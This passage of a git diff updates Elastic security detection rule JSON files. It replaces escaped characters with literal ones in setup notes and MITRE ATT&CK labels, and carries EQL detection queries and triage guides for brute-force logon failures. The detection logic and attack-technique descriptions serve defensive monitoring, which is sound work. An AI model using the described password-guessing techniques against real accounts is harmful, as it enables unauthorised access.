b/packages/security_detection_engine/kibana/security_rule/483c4daf-b0c6-49e0-adf3-0bfa93231d6b_105.json @@ -58,7 +58,7 @@ ], "risk_score": 47, "rule_id": "483c4daf-b0c6-49e0-adf3-0bfa93231d6b", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -72,7 +72,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0001", "name": "Initial Access", @@ -87,7 +87,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0008", "name": "Lateral Movement", diff --git a/packages/security_detection_engine/kibana/security_rule/483c4daf-b0c6-49e0-adf3-0bfa93231d6b_106.json b/packages/security_detection_engine/kibana/security_rule/483c4daf-b0c6-49e0-adf3-0bfa93231d6b_106.json index 2187140b7c1..c4e70bf8f40 100644 --- a/packages/security_detection_engine/kibana/security_rule/483c4daf-b0c6-49e0-adf3-0bfa93231d6b_106.json +++ b/packages/security_detection_engine/kibana/security_rule/483c4daf-b0c6-49e0-adf3-0bfa93231d6b_106.json @@ -57,7 +57,7 @@ ], "risk_score": 47, "rule_id": "483c4daf-b0c6-49e0-adf3-0bfa93231d6b", - "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -71,7 +71,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0001", "name": "Initial Access", @@ -86,7 +86,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0008", "name": "Lateral Movement", diff --git a/packages/security_detection_engine/kibana/security_rule/48819484-9826-4083-9eba-1da74cd0eaf2_1.json b/packages/security_detection_engine/kibana/security_rule/48819484-9826-4083-9eba-1da74cd0eaf2_1.json index 2b2caa06150..22504b11e0e 100644 --- a/packages/security_detection_engine/kibana/security_rule/48819484-9826-4083-9eba-1da74cd0eaf2_1.json +++ b/packages/security_detection_engine/kibana/security_rule/48819484-9826-4083-9eba-1da74cd0eaf2_1.json @@ -70,7 +70,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0001", "name": "Initial Access", diff --git a/packages/security_detection_engine/kibana/security_rule/48b3d2e3-f4e8-41e6-95e6-9b2091228db3_1.json b/packages/security_detection_engine/kibana/security_rule/48b3d2e3-f4e8-41e6-95e6-9b2091228db3_1.json index d85e9048382..1f282f7bdc6 100644 --- a/packages/security_detection_engine/kibana/security_rule/48b3d2e3-f4e8-41e6-95e6-9b2091228db3_1.json +++ b/packages/security_detection_engine/kibana/security_rule/48b3d2e3-f4e8-41e6-95e6-9b2091228db3_1.json @@ -74,7 +74,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", @@ -96,7 +96,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0011", "name": "Command and Control", diff --git a/packages/security_detection_engine/kibana/security_rule/48b3d2e3-f4e8-41e6-95e6-9b2091228db3_2.json b/packages/security_detection_engine/kibana/security_rule/48b3d2e3-f4e8-41e6-95e6-9b2091228db3_2.json index ca65fe8c297..0bea881a2f2 100644 --- a/packages/security_detection_engine/kibana/security_rule/48b3d2e3-f4e8-41e6-95e6-9b2091228db3_2.json +++ b/packages/security_detection_engine/kibana/security_rule/48b3d2e3-f4e8-41e6-95e6-9b2091228db3_2.json @@ -79,7 +79,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", @@ -101,7 +101,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0011", "name": "Command and Control", diff --git a/packages/security_detection_engine/kibana/security_rule/48b3d2e3-f4e8-41e6-95e6-9b2091228db3_3.json b/packages/security_detection_engine/kibana/security_rule/48b3d2e3-f4e8-41e6-95e6-9b2091228db3_3.json index 54381134e61..c89b8cb9fa1 100644 --- a/packages/security_detection_engine/kibana/security_rule/48b3d2e3-f4e8-41e6-95e6-9b2091228db3_3.json +++ b/packages/security_detection_engine/kibana/security_rule/48b3d2e3-f4e8-41e6-95e6-9b2091228db3_3.json @@ -79,7 +79,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", @@ -101,7 +101,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0011", "name": "Command and Control", diff --git a/packages/security_detection_engine/kibana/security_rule/48b3d2e3-f4e8-41e6-95e6-9b2091228db3_4.json b/packages/security_detection_engine/kibana/security_rule/48b3d2e3-f4e8-41e6-95e6-9b2091228db3_4.json index ecad6edac17..3e2ae08f424 100644 --- a/packages/security_detection_engine/kibana/security_rule/48b3d2e3-f4e8-41e6-95e6-9b2091228db3_4.json +++ b/packages/security_detection_engine/kibana/security_rule/48b3d2e3-f4e8-41e6-95e6-9b2091228db3_4.json @@ -80,7 +80,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", @@ -102,7 +102,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0011", "name": "Command and Control", diff --git a/packages/security_detection_engine/kibana/security_rule/48b3d2e3-f4e8-41e6-95e6-9b2091228db3_5.json b/packages/security_detection_engine/kibana/security_rule/48b3d2e3-f4e8-41e6-95e6-9b2091228db3_5.json index 25203a02350..55cfc2a47db 100644 --- a/packages/security_detection_engine/kibana/security_rule/48b3d2e3-f4e8-41e6-95e6-9b2091228db3_5.json +++ b/packages/security_detection_engine/kibana/security_rule/48b3d2e3-f4e8-41e6-95e6-9b2091228db3_5.json @@ -86,7 +86,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", @@ -108,7 +108,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0011", "name": "Command and Control", diff --git a/packages/security_detection_engine/kibana/security_rule/48b3d2e3-f4e8-41e6-95e6-9b2091228db3_6.json b/packages/security_detection_engine/kibana/security_rule/48b3d2e3-f4e8-41e6-95e6-9b2091228db3_6.json index 0a8d901fc5d..e36b4cdf8e8 100644 --- a/packages/security_detection_engine/kibana/security_rule/48b3d2e3-f4e8-41e6-95e6-9b2091228db3_6.json +++ b/packages/security_detection_engine/kibana/security_rule/48b3d2e3-f4e8-41e6-95e6-9b2091228db3_6.json @@ -86,7 +86,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", @@ -108,7 +108,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0011", "name": "Command and Control", diff --git a/packages/security_detection_engine/kibana/security_rule/48b6edfc-079d-4907-b43c-baffa243270d_4.json b/packages/security_detection_engine/kibana/security_rule/48b6edfc-079d-4907-b43c-baffa243270d_4.json index 1939cc79f8d..9a816944dce 100644 --- a/packages/security_detection_engine/kibana/security_rule/48b6edfc-079d-4907-b43c-baffa243270d_4.json +++ b/packages/security_detection_engine/kibana/security_rule/48b6edfc-079d-4907-b43c-baffa243270d_4.json @@ -13,7 +13,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Multiple Logon Failure from the same Source Address", - "note": "## Triage and analysis\n\n### Investigating Multiple Logon Failure from the same Source Address\n\nAdversaries with no prior knowledge of legitimate credentials within the system or environment may guess passwords to attempt access to accounts. Without knowledge of the password for an account, an adversary may opt to guess the password using a repetitive or iterative mechanism systematically. More details can be found [here](https://attack.mitre.org/techniques/T1110/001/).\n\nThis rule identifies potential password guessing/brute force activity from a single address.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the logon failure reason code and the targeted user names.\n - Prioritize the investigation if the account is critical or has administrative privileges over the domain.\n- Investigate the source IP address of the failed Network Logon attempts.\n - Identify whether these attempts are coming from the internet or are internal.\n- Investigate other alerts associated with the involved users and source host during the past 48 hours.\n- Identify the source and the target computer and their roles in the IT environment.\n- Check whether the involved credentials are used in automation or scheduled tasks.\n- If this activity is suspicious, contact the account owner and confirm whether they are aware of it.\n- Examine the source host for derived artifacts that indicate compromise:\n - Observe and collect information about the following activities in the alert source host:\n - Attempts to contact external domains and addresses.\n - Examine the DNS cache for suspicious or anomalous entries.\n - $osquery_0\n - Examine the host services for suspicious or anomalous entries.\n - $osquery_1\n - $osquery_2\n - $osquery_3\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the host which is the source of this activity\n\n### False positive analysis\n\n- Understand the context of the authentications by contacting the asset owners. This activity can be related to a new or existing automation or business process that is in a failing state.\n- Authentication misconfiguration or obsolete credentials.\n- Service account password expired.\n- Domain trust relationship issues.\n- Infrastructure or availability issues.\n\n### Related rules\n\n- Multiple Logon Failure Followed by Logon Success - 4e85dc8a-3e41-40d8-bc28-91af7ac6cf60\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the source host to prevent further post-compromise behavior.\n- If the asset is exposed to the internet with RDP or other remote services available, take the necessary measures to restrict access to the asset. If not possible, limit the access via the firewall to only the needed IP addresses. Also, ensure the system uses robust authentication mechanisms and is patched regularly.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", + "note": "## Triage and analysis\n\n### Investigating Multiple Logon Failure from the same Source Address\n\nAdversaries with no prior knowledge of legitimate credentials within the system or environment may guess passwords to attempt access to accounts. Without knowledge of the password for an account, an adversary may opt to guess the password using a repetitive or iterative mechanism systematically. More details can be found [here](https://attack.mitre.org/techniques/T1110/001/).\n\nThis rule identifies potential password guessing/brute force activity from a single address.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the logon failure reason code and the targeted user names.\n - Prioritize the investigation if the account is critical or has administrative privileges over the domain.\n- Investigate the source IP address of the failed Network Logon attempts.\n - Identify whether these attempts are coming from the internet or are internal.\n- Investigate other alerts associated with the involved users and source host during the past 48 hours.\n- Identify the source and the target computer and their roles in the IT environment.\n- Check whether the involved credentials are used in automation or scheduled tasks.\n- If this activity is suspicious, contact the account owner and confirm whether they are aware of it.\n- Examine the source host for derived artifacts that indicate compromise:\n - Observe and collect information about the following activities in the alert source host:\n - Attempts to contact external domains and addresses.\n - Examine the DNS cache for suspicious or anomalous entries.\n - $osquery_0\n - Examine the host services for suspicious or anomalous entries.\n - $osquery_1\n - $osquery_2\n - $osquery_3\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the host which is the source of this activity\n\n### False positive analysis\n\n- Understand the context of the authentications by contacting the asset owners. This activity can be related to a new or existing automation or business process that is in a failing state.\n- Authentication misconfiguration or obsolete credentials.\n- Service account password expired.\n- Domain trust relationship issues.\n- Infrastructure or availability issues.\n\n### Related rules\n\n- Multiple Logon Failure Followed by Logon Success - 4e85dc8a-3e41-40d8-bc28-91af7ac6cf60\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the source host to prevent further post-compromise behavior.\n- If the asset is exposed to the internet with RDP or other remote services available, take the necessary measures to restrict access to the asset. If not possible, limit the access via the firewall to only the needed IP addresses. Also, ensure the system uses robust authentication mechanisms and is patched regularly.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", "query": "sequence by winlog.computer_name, source.ip with maxspan=10s\n [authentication where host.os.type == \"windows\" and event.action == \"logon-failed\" and\n /* event 4625 need to be logged */\n winlog.logon.type : \"Network\" and\n source.ip != null and source.ip != \"127.0.0.1\" and source.ip != \"::1\" and\n not user.name : (\"ANONYMOUS LOGON\", \"-\", \"*$\") and not user.domain == \"NT AUTHORITY\" and\n\n /*\n noisy failure status codes often associated to authentication misconfiguration :\n 0xC000015B - The user has not been granted the requested logon type (also called the logon right) at this machine.\n 0XC000005E\t- There are currently no logon servers available to service the logon request.\n 0XC0000133\t- Clocks between DC and other computer too far out of sync.\n 0XC0000192\tAn attempt was made to logon, but the Netlogon service was not started.\n */\n not winlog.event_data.Status : (\"0xC000015B\", \"0XC000005E\", \"0XC0000133\", \"0XC0000192\")] with runs=10\n", "references": [ "https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4625" @@ -72,7 +72,7 @@ ], "risk_score": 47, "rule_id": "48b6edfc-079d-4907-b43c-baffa243270d", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Elastic", @@ -84,7 +84,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", diff --git a/packages/security_detection_engine/kibana/security_rule/48b6edfc-079d-4907-b43c-baffa243270d_5.json b/packages/security_detection_engine/kibana/security_rule/48b6edfc-079d-4907-b43c-baffa243270d_5.json index 16943da7f68..9e730769535 100644 --- a/packages/security_detection_engine/kibana/security_rule/48b6edfc-079d-4907-b43c-baffa243270d_5.json +++ b/packages/security_detection_engine/kibana/security_rule/48b6edfc-079d-4907-b43c-baffa243270d_5.json @@ -13,7 +13,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Multiple Logon Failure from the same Source Address", - "note": "## Triage and analysis\n\n### Investigating Multiple Logon Failure from the same Source Address\n\nAdversaries with no prior knowledge of legitimate credentials within the system or environment may guess passwords to attempt access to accounts. Without knowledge of the password for an account, an adversary may opt to guess the password using a repetitive or iterative mechanism systematically. More details can be found [here](https://attack.mitre.org/techniques/T1110/001/).\n\nThis rule identifies potential password guessing/brute force activity from a single address.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the logon failure reason code and the targeted user names.\n - Prioritize the investigation if the account is critical or has administrative privileges over the domain.\n- Investigate the source IP address of the failed Network Logon attempts.\n - Identify whether these attempts are coming from the internet or are internal.\n- Investigate other alerts associated with the involved users and source host during the past 48 hours.\n- Identify the source and the target computer and their roles in the IT environment.\n- Check whether the involved credentials are used in automation or scheduled tasks.\n- If this activity is suspicious, contact the account owner and confirm whether they are aware of it.\n- Examine the source host for derived artifacts that indicate compromise:\n - Observe and collect information about the following activities in the alert source host:\n - Attempts to contact external domains and addresses.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the host which is the source of this activity\n\n### False positive analysis\n\n- Understand the context of the authentications by contacting the asset owners. This activity can be related to a new or existing automation or business process that is in a failing state.\n- Authentication misconfiguration or obsolete credentials.\n- Service account password expired.\n- Domain trust relationship issues.\n- Infrastructure or availability issues.\n\n### Related rules\n\n- Multiple Logon Failure Followed by Logon Success - 4e85dc8a-3e41-40d8-bc28-91af7ac6cf60\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the source host to prevent further post-compromise behavior.\n- If the asset is exposed to the internet with RDP or other remote services available, take the necessary measures to restrict access to the asset. If not possible, limit the access via the firewall to only the needed IP addresses. Also, ensure the system uses robust authentication mechanisms and is patched regularly.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n\n-", + "note": "## Triage and analysis\n\n### Investigating Multiple Logon Failure from the same Source Address\n\nAdversaries with no prior knowledge of legitimate credentials within the system or environment may guess passwords to attempt access to accounts. Without knowledge of the password for an account, an adversary may opt to guess the password using a repetitive or iterative mechanism systematically. More details can be found [here](https://attack.mitre.org/techniques/T1110/001/).\n\nThis rule identifies potential password guessing/brute force activity from a single address.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the logon failure reason code and the targeted user names.\n - Prioritize the investigation if the account is critical or has administrative privileges over the domain.\n- Investigate the source IP address of the failed Network Logon attempts.\n - Identify whether these attempts are coming from the internet or are internal.\n- Investigate other alerts associated with the involved users and source host during the past 48 hours.\n- Identify the source and the target computer and their roles in the IT environment.\n- Check whether the involved credentials are used in automation or scheduled tasks.\n- If this activity is suspicious, contact the account owner and confirm whether they are aware of it.\n- Examine the source host for derived artifacts that indicate compromise:\n - Observe and collect information about the following activities in the alert source host:\n - Attempts to contact external domains and addresses.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the host which is the source of this activity\n\n### False positive analysis\n\n- Understand the context of the authentications by contacting the asset owners. This activity can be related to a new or existing automation or business process that is in a failing state.\n- Authentication misconfiguration or obsolete credentials.\n- Service account password expired.\n- Domain trust relationship issues.\n- Infrastructure or availability issues.\n\n### Related rules\n\n- Multiple Logon Failure Followed by Logon Success - 4e85dc8a-3e41-40d8-bc28-91af7ac6cf60\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the source host to prevent further post-compromise behavior.\n- If the asset is exposed to the internet with RDP or other remote services available, take the necessary measures to restrict access to the asset. If not possible, limit the access via the firewall to only the needed IP addresses. Also, ensure the system uses robust authentication mechanisms and is patched regularly.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n\n-", "query": "sequence by winlog.computer_name, source.ip with maxspan=10s\n [authentication where host.os.type == \"windows\" and event.action == \"logon-failed\" and\n /* event 4625 need to be logged */\n winlog.logon.type : \"Network\" and\n source.ip != null and source.ip != \"127.0.0.1\" and source.ip != \"::1\" and\n not user.name : (\"ANONYMOUS LOGON\", \"-\", \"*$\") and not user.domain == \"NT AUTHORITY\" and\n\n /*\n noisy failure status codes often associated to authentication misconfiguration :\n 0xC000015B - The user has not been granted the requested logon type (also called the logon right) at this machine.\n 0XC000005E\t- There are currently no logon servers available to service the logon request.\n 0XC0000133\t- Clocks between DC and other computer too far out of sync.\n 0XC0000192\tAn attempt was made to logon, but the Netlogon service was not started.\n */\n not winlog.event_data.Status : (\"0xC000015B\", \"0XC000005E\", \"0XC0000133\", \"0XC0000192\")] with runs=10\n", "references": [ "https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4625", @@ -87,7 +87,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", diff --git a/packages/security_detection_engine/kibana/security_rule/48b6edfc-079d-4907-b43c-baffa243270d_6.json b/packages/security_detection_engine/kibana/security_rule/48b6edfc-079d-4907-b43c-baffa243270d_6.json index 78ba41e38cf..8bf24447960 100644 --- a/packages/security_detection_engine/kibana/security_rule/48b6edfc-079d-4907-b43c-baffa243270d_6.json +++ b/packages/security_detection_engine/kibana/security_rule/48b6edfc-079d-4907-b43c-baffa243270d_6.json @@ -13,7 +13,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Multiple Logon Failure from the same Source Address", - "note": "## Triage and analysis\n\n### Investigating Multiple Logon Failure from the same Source Address\n\nAdversaries with no prior knowledge of legitimate credentials within the system or environment may guess passwords to attempt access to accounts. Without knowledge of the password for an account, an adversary may opt to guess the password using a repetitive or iterative mechanism systematically. More details can be found [here](https://attack.mitre.org/techniques/T1110/001/).\n\nThis rule identifies potential password guessing/brute force activity from a single address.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the logon failure reason code and the targeted user names.\n - Prioritize the investigation if the account is critical or has administrative privileges over the domain.\n- Investigate the source IP address of the failed Network Logon attempts.\n - Identify whether these attempts are coming from the internet or are internal.\n- Investigate other alerts associated with the involved users and source host during the past 48 hours.\n- Identify the source and the target computer and their roles in the IT environment.\n- Check whether the involved credentials are used in automation or scheduled tasks.\n- If this activity is suspicious, contact the account owner and confirm whether they are aware of it.\n- Examine the source host for derived artifacts that indicate compromise:\n - Observe and collect information about the following activities in the alert source host:\n - Attempts to contact external domains and addresses.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the host which is the source of this activity\n\n### False positive analysis\n\n- Understand the context of the authentications by contacting the asset owners. This activity can be related to a new or existing automation or business process that is in a failing state.\n- Authentication misconfiguration or obsolete credentials.\n- Service account password expired.\n- Domain trust relationship issues.\n- Infrastructure or availability issues.\n\n### Related rules\n\n- Multiple Logon Failure Followed by Logon Success - 4e85dc8a-3e41-40d8-bc28-91af7ac6cf60\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the source host to prevent further post-compromise behavior.\n- If the asset is exposed to the internet with RDP or other remote services available, take the necessary measures to restrict access to the asset. If not possible, limit the access via the firewall to only the needed IP addresses. Also, ensure the system uses robust authentication mechanisms and is patched regularly.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n\n-", + "note": "## Triage and analysis\n\n### Investigating Multiple Logon Failure from the same Source Address\n\nAdversaries with no prior knowledge of legitimate credentials within the system or environment may guess passwords to attempt access to accounts. Without knowledge of the password for an account, an adversary may opt to guess the password using a repetitive or iterative mechanism systematically. More details can be found [here](https://attack.mitre.org/techniques/T1110/001/).\n\nThis rule identifies potential password guessing/brute force activity from a single address.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the logon failure reason code and the targeted user names.\n - Prioritize the investigation if the account is critical or has administrative privileges over the domain.\n- Investigate the source IP address of the failed Network Logon attempts.\n - Identify whether these attempts are coming from the internet or are internal.\n- Investigate other alerts associated with the involved users and source host during the past 48 hours.\n- Identify the source and the target computer and their roles in the IT environment.\n- Check whether the involved credentials are used in automation or scheduled tasks.\n- If this activity is suspicious, contact the account owner and confirm whether they are aware of it.\n- Examine the source host for derived artifacts that indicate compromise:\n - Observe and collect information about the following activities in the alert source host:\n - Attempts to contact external domains and addresses.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - 